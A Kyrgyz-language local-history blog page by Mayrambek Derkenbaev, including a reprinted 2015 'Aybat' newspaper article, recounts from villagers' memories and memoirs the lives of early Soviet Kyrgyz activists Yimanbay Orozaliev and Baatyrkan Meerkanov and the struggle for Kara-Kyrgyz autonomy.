    Ошол жылы май айында “Ташкенттен Шкапский менен Тынышбаевдер келе жатышат, Алма-Атада губернатордун ордуна иштешет экен” деп, Пишпектегилер тосууга камынышты. Шкапский менен Тынышбаевди кадимки илгерки улуктар сыяктуу нан туз менен тосуп алышат, Пишпек уезди убактылуу өкмөткө баш ийе тургандыгын айтышты. Ошондо Ыйманбай Орозалин “булар бай-манапты жакташат, көрбөйсүңбү, бул жерде большевиктер жок, жалаң бай-манаптар чогулуптур” – деди. Кебетеси Иваницин баштаган жарды-жалчылар катышпаса керек. Алар жөнөп кеткен соң, Пишпекте адегенде Васильевский партия деген, Ат-Башы каналын казып жаткан уюмдун кызматчылары уезддик мекемелерди ээлеп алып, инженер Васильев аткаруу комитетинин председатели, Гурбанов уезддик комиссар болду – деп жазат.
    Бөрүбай Кененсарин эскерген Ыйманбай Орозалин Ленин менен тааныш болгонун, андан кат алып турганын айылдаштарым Шаршеналиев Мыктыбек, Иманалиев Нуркаштардан укканым бар.
    1890-жылдары Кара-Күңгөй суусунун жээгине Жаныш уулу Данакан деген бай мечит салдырып, мечитте Ихлас деген көлдүк молдо сабак берет.
    Ыйманбай Орозалы уулу ошо мечиттен билим алып, көр турмуштун айынан Урал, Оренбург жана башка орус жерлеринде жалданып иштейт. Ошо кезде социалдык-демократтардын (коммунист – большевиктердин) социалдык теңчилик күрөштүн зарылчылыгы жөнүндөгү идеялар менен таанышат.
    Айдакеев Шаршеналы деген аксакал айтчу экен Ыйманбай бизди Үркүнгө чейин Сагын болуштун таманында, кээде Данакандын мечитинде окутуп калчу. Ал “Искра” деген гезитти “Учкун” деп окуп берчү. “Учкундан жалын тутанат”, “Бөлтүрүк карышкыр болот” жаңы коом түзүлөт дечү эле. Революция жөнүндө кеп козгочу. Өзү Ленинди көргөнүн, аны менен тааныштыгын айтаар эле. Ленинден ошо кезде өтүк, маки, гезит, посылка келгенин көргөнбүз деп. 1916-жылы Улуттук боштондук күрөшүнө чыккан кезде Ыйманбай: ” оруска каршы чыкпагыла, алардын огу жаман, бөөдө кырыласыңар”, – дейт.
    Эл ага каршы чыгып: “Бул орусту колдойт, чокундук болду”, – деп, “Орозалынын чокундугу” деп атап алышат. Ошондон кийин Ыйманбай Орозалынын чокундугу аталат. “Орустун огу жаман” дегенге болбой, эл Кара-Коого кол салып, орустун огунан Атанбай уулу Ындыбай деген тууганы мерт болот. Эл качууга кам көрөт. Анда да Ыйманбай “качпагыла” десе болбой үркөт. Ошондон кийин Орозалынын Ыйманбайы фронтко өз эрки менен жөнөп кетет.
    Андан келген соң, А.И.Иваницин, Г.Б.Безбородов, Иманалы Айдарбеков жана башка большевиктер менен бирге Пишпек уездинин революциялык комитетинде иш алып барат. Орозалиев Ыйманбай Верныйда кандайдыр бир белдүү кызматта иштейт. 1924-жылдары келип, Турганбай болуштун күмүш каштуу Анжыян ээрин Айдакеев Шаршенаалыга берет.
    – Ме, бу ээрди менден эстелик кылып токунуп жүр. Эмки келгенде сени ичкериге алып барып окутуп киши кылам – дейт. Шаршенаалы ал кезде 14-15деги бала экен. Ал “мени тигил жакта “Кудрявый волос” “тармал чач” деп чакырат – деп айтыптыр. Ошо бойдон ал айылга кайтып келбептир. Кетээр кезде айылдаштарына биз кыргыз элин казактардан бөлүү ишин жүргүзүп жатабыз. Бизге Худайкулов баштаган топ каршы чыгууда деп айткан дейт. Шаршеналиев Мыктыбек Орозалиев Ыйманбай “Арык тукумунун саркалдык уруусунун Бекбоо уругунан эле. Ал 1924-жылы Кара кыргыз автономиялуу облусун түзүүгө катышы бар үчүн, каршы талаптар аялы аркылуу уу бердиртип салыптыр. Мага таяке болот. Архивден изилдесе чыгаар эле – деп айтып калат. Жыйынтыктап айтканда, Орозалиев Ыйманбай (Орозалынын чокундугу) 1908-жылы большевиктер партиясына (КПССке) өтүп, В.И.Ленин менен жолукса керек. Андан соң И.Арабаев, А.Сыдыков баштаган топко кошулуп Кара Кыргыз автономиялуу облусун түзүү үчүн күрөшүп, ошол күрөштө (Р.Худайкуловдун тобу тарабынан) курман болгон.
    Майрамбек Деркенбаев,
    Кочкор району, Кош-Дөбө айыл округу, Кара-Күңгөй айылы.

  3. № 122 • 3-апрель, 2015-жыл “Айбат” гезити.
    КАРА-КЫРГЫЗ АВТОНОМИЯСЫНА 9оЖЫЛ
    МАМЛЕКЕТТИ ТЇПТЄЄДЄ КУРМАН БОЛГОН…
    1988-жылы мен Кочкор кыштагында жашаган, согуштун жана эмгектин ардагери Бозгунчу Оторбаев менен маектешип калдым. Сєздєн сєз чыгып олтуруп, Бозгунчу аксакал: -«Баатыркан Мээрканов деген Семизбел волкомунан чыккан тыў жигит бар эле. Ал Кыргыздын мыкты жетекчилеринин бири болчу. Бетке айткан, абдан чечен, орус тилин жакшы билчї. Бизди комсомол ячейкасына кызматка койгон. Кийин жыйындарда кєрїп калаар элем, сїйлєгєндє їнї шаўшып, такалбай сїйлєп, элдин кєўїлїн єзїнє буруп турчу. Ташкент шаарында, Орто Азия бюросунун жооптуу катчысы болуп кєтєрїлїп кетип, киши колдуу болуп єлдї. Кыргызды жетектеп кетчї жигит деп замандаштары айтаар эле. +мїрї кыска болду» -деп айтканы эсимде. Оторбаев Бозгунчу аксакал Совет єкмєтї алгач тїзїлгєндє комсомолдук ячейкада иштеп, алгачкы Сельсоветтерден болгон, кийин заправкада иштеп жїрїп ардактуу эс алууга чыккан, куйма кулак адам болгон. Мен жаштык кылып, ал кишиден Баатыркан Мээрканов тууралуу кененирээк сурап калбаганыма єкїнєм. Кийинчерээк мен бул адамдын ємїр жолуна кызыгып єз алдымча изилдеп маалыматтарды чогулта баштадым. Баатыркан кичинесинен тыў бала болуп чоўоёт. Ал болжол менен 1904-жылдары Кочкордун Кара-Кїўгєйїндє тєрєлїп, Сазановкадагы (Байсоорунда) орус-тузем мектебинде окуп орус тилин такалбай шар сїйлєгєнгє жетишет. Ал жерде Касым Тыныстанов, Жусуп Абдырахманов, Кожокан Шооруков сыяктуу белгилїї инсандар менен бирге окуган. Андан соў Кара-Колдогу жогорку тєрт сыныптык баштапкы окуу жайына кабыл алынып, пансионго кабыл алынат. Кыргыз жазуучусу Эрнис Турсунов «Жусуп Абдрахманов» жєнїндєгї эмгектеринин биринде 1911-жылы Ж. Абдрахманов бул мектепке окууга барганда, орусча шар сїйлєгєн Баатыркан Мээрканов деген тирикарак тыў бала бар экенин эскерет. 1916 –жылкы Улуттук боштондук їчїн болгон кїрєштє Пржевальск уездинин начальниги Иннокентий Иванов Кыргыз жеринен Россияга качып, КызылОрдого келип чек арадан єтїп кетет. Казармада жоокерлер єздєрї менен бирге Жусуп Абдырахманов, Баатыркан Мээрканов, Кожокан Шооруковду ала кетип, Жусуп Казакстанга, Баатыркан Ташкентке кеткендерге туш келет. Бул жигиттер 1917-жылдарда кайтып келип, Совет єкмєтїнїн тїзїлїшїнє салымдарын кошуп, жетекчи кызматтарда иштей башташат. Совет бийлигин Тїркстанда чыўдоо їчїн 1919-жылы 14-августа Тїкстан фронту уюшулган. Баатыркан Мээрканов да аскер кызматын єтєп, 1920-жылдарга чейин єлкєнї басмачылардан тазалоо иштерине катышат. Андан соў Ташкентеги революциялык комитететинде кийин РКП ( б) нын Орто Азия бюросунда жооптуу иштерди аткарган. 1920-жылы Кыргыз, казактарды жерин ажыратпастан Кыргыз автономиялуу Республикасы тїзїлєт. Ага Кыргызстандын тїндїгї баш ийип, тїштїгї Тїркстан АССР инин курамында калды. 1921-жылдары Жети-Суу областык советинин аткаруу комитетинин тєрагасы Абдыкерим Сыдыков, Тїркстан АССРинин эл агартуу комиссариатынын мїчєсї Ишеналы Арабаев, Тїркстан Компартиясынын Алма-Ата уездик-калаалык калаалык комитетинин жоопту катчысы, Партиянын Жети-Суу обкомунун мїчєсї Жусуп Абдырахманов баштаган топ Тоолуу Кыргыз облусун тїзїї маселесин кєтєрїп башташкан..Кєптєгєн аракттер менен 1922-жылы 23-мартта Тїркстан Компартиясынын борбордук комитетинин катчылыгы Тїркстан Республикасынын курамында Тоолуу Кыргыз обласын тїзїї чечимин кабыл алды. Курамында КараКол, Пишпек, Нарын уездери, Олуя-Ата уездинин тоолуу бєлїгї кирип борбору Кочкор болгон Тоолуу Кыргыз облусун тїзїї боюнча Тїрк БАК 26-мартта чечим кабыл алды. Бирок, бул ишке теги боюнча Казактын Абла уруусунан чыгып, кийин Кыргыздашып кеткен Рахманкул Кудайкулов єзїнїн тобу менен бирге каршы чыккан.Ал баштаган топ «Тоолу Кыргыз обласын тїзїї улутчулдук, анын артында бай-манаптык элементтер турат, казаккыргыз бир эл аны бєлїїгє болбойт» -деп чыккан. Бул топтун кийлигишїїсї менен РКП (б) нын Борбордук комитети 1922жылы декабрда Тоолу Кыргыз обласын тїзїї боюнча мурдагы чечимдерди мыйзамсыз деп таап, алардын жетекчилерин улутчулдар деп кїнєлгєн. Ошентип, борбору Кочкор кыштагы аталган Тоолу Кыргыз облусу (Ала-Тоо кыргыз облусу) 72 кїн гана ємїр сїрдї. Кармаш кайра уланып Кыргыздар автономия болуу їчїн кїрєшє баштады. Кыргыз автономиясынын жактагандардын арасында Баатыркан Мээрканов да болгон.1924-жылы саясий бюро Кара Кыргыздар Кыргыз АССРинин (казак) курамына облус болуп кошулсун деген чечим чыгарат. Буга казак тарап кубанган менен Ташкент жетекчилери каршы чыкты. +збектер «Кара-Кыргыздарга оорукана, маданий жайларды биз салып беребиз, аларга мамлекетїїлїк бербеш керек» дешти. Кыргыз жетекчилери дагы экиге бєлїндї. Биринчи тарапта Кара- Кыргыз Автономиялуу облусунун Орто Азиядагы туруктуу єкїлї теги кедей Рахманкул Кудайкулов, Д. Бабаханов сыяктуу Кыргызстандын партиялык-советтик кызматкерлеринин белгилїї адамдары болуп, Казактардын ичинде автономия болууну жакташты. Экинчи топто РСФСРдын курамында болууну эўсеген Тїркстан Мамлекеттик соодасынын соода бєлїмїнїн башкаруучусу теги манап Абдыкерим Сыдыков, Жусуп Абдрахманов, Кыробкомдун бєлїм башчысы Баатыркан Мээрканов, айыл чарба бєлїмїнїн башчысы Эркимбек Эсенаманов, Ыбырай тойчинов, Жайнак Саадаев жана башкалар болушкан. Алардын аракети менен 1924-жылы 14-октябрда РСФСРдын курамындагы Кара-Кыргыз автономиялуу облусу тїзїлгєн. Зияш Бектенов «Замандаштарым жєнїндє эскерїї» китебинде: -«1924-жылы Пишпек шаарында ачылган Кыргызстан эл агартуу институнда окуй баштаганыбызда Эркимбек, Тєрєкул жана Баатыркан Мээрканов їч бойдок жигит биздин Дзержин кєчєсїндєгї ашканабыздын каршысындагы орустун їйїндє батирде турушчу. Айтматов Киробкомдун їгїт-насыят бєлїмї, Эсенаманов айыл чарба бєлїмї, Мээрканов Киробкомдун бєлїм башчысы болчу. Бул їч бойдок жигит Нагыйма, Фарида, Калыйча аттуу їч татар кызга кат жазышып, сїйлєшїп жїрїшкєндє, биз менен бир бєлмєдє жатчу Темиркулов Ыйманкул кыздар менен жигитердин каттарын ташып конфеттерин жеп жїргєн экен. Кєп узабай ал кыздардын Нагыймасына Тєрєкул, Фаридасына Эркимбек, Калыйчасына Баатыркан їйлєнїп алды да биз жеп жїргєн конфетибизден кагылып калган элек»…деп эскерет. Жогорудагы їч татар кызы кєптєгєн татар чыгармала-
    рын кыргызчага которуп, эл агартуу майданына зор эмгек сиўирген. Баатыркан Мээрканов, Тєрєкул Айтматов, Эркимбек Эсенаманов їчєє жакын достордон, катыш, аяштардан болушкан. Совет доорунун алгачкы жылдарында саясий ишмерлердин Орус улутундагы єкїлдєрї Еврей улутунан, кыргыз интелегенттери татар кыздарга їйлєнїшкєнї байкалат. Себеби бул калктын єкїлдєрї илим-билим боюнча алдыўкы улуттардан болушкан. Баатыркан Мээрканов да жаўыча жашоого, маданиятка умтулгандыктан татардын билимдїї кызына їйлєнгєн окшобойбу. 1925-жылы Тєрєкул Айтматов, Баатыркан Мээрканов, Эркимбек Эсенаманов КПССтин катарына єтїшєт. 1926- жылдарын мартынан 1927-жылдарга чейин Тєрєкул Айтматов ВКП ( Б )нын Каракол-Нарын кантондук комитетинин катчысы, ал эми Баатыркан 1925-жылдардын аягында 1926-жылдардын башында ушул кантондо ВЛКСМдын катчысы болуп Тєрєкул менен чогуу иштеген. Ошол эле 1926-жылы Баатыркан Борбордук комитеттин Орто Азия бюросунун бєлїм башчысы милдетин аткарып, эл комиссарлар кеўешинин жерге отурукташтыруу боюнча комиссиясынын єкїлї Мамбет Сїйїмбаев, Каракол канткомунун катчысы Сатар Кулматов, ички иштер комиссариатынын Караколдогу єкїлї Садыбакас Султангазиев, окружкомдун тєрагасы Сыдык Чоўбашев, Каракол округдук соттун тєрагасы Касый Бегалиев, Волисполкомдун тєрагалары болуп элди отурукташтыруу, ортолук чарбага кирбегендерди кулакка тартуу їчїн тоодогу кыргыздарды кыдырып, жаўы єкмєттїн саясатын жїргїзїшкєн. Алар Каракол-Нарын кантонундагы аймактарда бел чечпестен, кїн-тїнї ат їстїндє жїрїшкєн. Ошо жылдары азыркы Кочкор районуна караштуу Кара-Кїўгєй айылы Семиз-Бел болуштугу болуп, Кєлгє карап турган. Аларды Кочкор аймагына бириктирїї саясатына жергиликтїї калк макул болбой нааразычылык билдирип чыгышат. ВЛКСМдын катчысы Мээрканов Баатыркан, райаткомдун тєрагасы Кадыркул Боталиевдердин туугандары ушу айылда жашагандыктан элди Кочкорго кошулууга кєндїрїї аларга милдетендирилет. КараКїўгєй, Сарычат, Кошбулуў айылдарынын аксакалдарын чогултуп: -Совет єкмєтї жаўы саясат жїргїзїїдє, мурдагыдай уруу, урукка бєлїнїїгє болбойт. Кара-Кол калаасы бизден алыс. Ошондуктан Кочкорго кошулуп там салып, олтурукташкыла! –деп жэргиликтїї калктан Оторбаев Бозгунчу, Быйтыканов Омор, Осмон деген жигиттерди комсомолго жетекчи кылып кєтєрїп элди тынчтандырат. Иманалиев Нуркаш ( Кочкор району, Кара-Кїўгєй айылы) –«1926-1930-жылы Баатыркан Мээрканов келип Кара-Кїўгєйдїн элине –«Сарбагыш, Арык тукум деп бєлїнбєй, Семиз-Белге, Кызыл-Тоого (азыркы кара жолду жээктей) отурукташкыла. Совхоз болосуўар. Азыркы конушуўар жайыт, айдоо аянты болсун»-дейт. Бирок, айыл билермандары Ботоканов Ыйманалы, Аблесов Алайдар «биз совхоз болсок єкмєт бизге сєйкєлїї чочко кой ( меринос) бактырат»-деп, элди їгїтєп кєчпєй коюшат. « Электр» колхозундагы контораны Баатыркан салдырып бериптир»-деп, айтып берген эле. Баатырканды 1926-жылдары Пишпек окружкомунда иш начар болгондуктан, ВЛКСМдын катчысы кылып которушат, ал жерде комсомолдук ячейкаларды ачып, комсомолдук иштерди улантат. Ушу жылдары « Эркин Тоо» гезитине да редакторлук кылып, 26-майдан 10-июнга чейин иштеген. Газетанын 56-63- сандарынын чыгышына редакторлук кылган. Басма сєздє иштеген жылдары « Эркин Тоого» кандай макалаларды жазганы бизге белгисиз. Аны билїї їчїн архивтик материалдарды аўтарып карап чыгуу керек. Мїмкїн ал макалаларын лакап ат менен жазгандыр. Анткени мезгил шартына жараша, кыйын кезеўде авторлор єз аттарын жашырып, лакап аттарды колдонушкан. Алсак Касым Тыныстанов- Кыт, келгин, Тагай, К.Т, Бєрїбай Кененсарин-Толкун, Чынчыл, Узакбай Абдукаимов- їмїт, Кусейин Карасаев- Жаркын деген лакап ат колдонушса, гезит беттериндеги кабарлардын аягында «Акыйкат», «Айгак», «Кєгєн», «Билген», «Уйгак» сыяктуу кєптєгєн жашыруун аттар кездешкен тууралуу маалыматтар бар. 1927-жылдын башында Баатыркан Фрунзе шаардык райкомунда їгїт-насыят бєлїмїнїн жетекчиси болуп дайындалат. Пишпектеги борбордук педогогика техникумунун директору Базаркул Данияров ар кандай тарыхый даталарда Баатыркан Мээркановду чакырып, ал студентердин суроолоруна жооп берип карым катнашта болгондугу тууралуу маалыматтар бар. Жусуп Абдракманов кїндєлїгїндє 23.09. 1928-жылы «Саат їч жарымда Рябовдо Москвиндин орун басарында болдум. Кыргызстанга келїїчї кызматкерлер жана жолдош Мээркановду Свердлов университетине жиберїї жєнїндє сїйлєштїм. Кызматкерлер боюнча убадасын берди. Ал эми Мээрканов жєнїндє МК (оўчулдарга каршы компания) менен макулдашууну сунуш кылды»-деп жазат. Мында кєрїнгєндєй Мээрканов ошол кездин алдыўкы катардагы адамы болгон. 1929- 1930- жылдары Баатыркан ВКП (Б ) нын Талас кантонунун жооптуу катчысы, 1930- жылы Орто Азия бюросунун жоопту катчысы болуп дайындалып Кыргыз АССРинин таламын талашып иштеп турган. Отуз биринчи жылдары ВКП (Б) нын Орто Азия бюросунун жоопту катчысы Мээрканов Ташкенттеги бир кабатуу батирде турчу. Кечинде чогулуштан кеч келген Баатыркан їйгє кире бергенде желкесине ок жаўылган. Жазуучу Эрнис Турсунов 1988-жылы «Кыргызстан маданияты» гезитине: «Тїнкї саат бирде бюродон кайткан Мээрканов эшикти тартса ачылбайт. Какса эч ким їн катпайт. Алар Ташкентте бир кабат тамда турушчу. Аўгыча їй ичинен: «Баатыркан, сыртта кызыўдын ороосу жайылуу турат, ала келчи»деген аялынын їнї чыгат. Адептїї, элпек Мээрканов жипте жайылуу турган ороо, чулгоону, кєтєрїп кире бергенде желкеге ок тиет. Кєрсє Баатыркан келгенде каалганын артында турган Татар офицери тапанчасын кобурадан чыгарып желкеге аткан тура. Аялы Баатырканды эл душманы єлтїрдї деп, билдирет. Анын єлїмїнїн чыныгы себептери ачылбай калат. Сєєгї эки кїндєн кийин аза кїтїї музыкасы менен коштолуп, Ташкенттеги кєрїстєнгє коюлат. Мээркановду узатуу аземине САГУ нун САХИПИнин студентери, угуучулар, курсанттар келип кєрїстєнгє самсып чубап барышкан-деп, жазат. Албетте, Баатыркан Мээрканов єтє жаш 26-27 жашында дїйнє салды. Ошол аз ємїрдє кєп иштеп, кызматтык тепкичтерге єсїп олтурган. Бирок, аттиў бир октук тура. (уландысы кийинки санда) Майрамбек ДЕРКЕНБАЕВ

Leave a Reply to Майрамбек Деркенбаев Жоопту жокко чыгаруу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *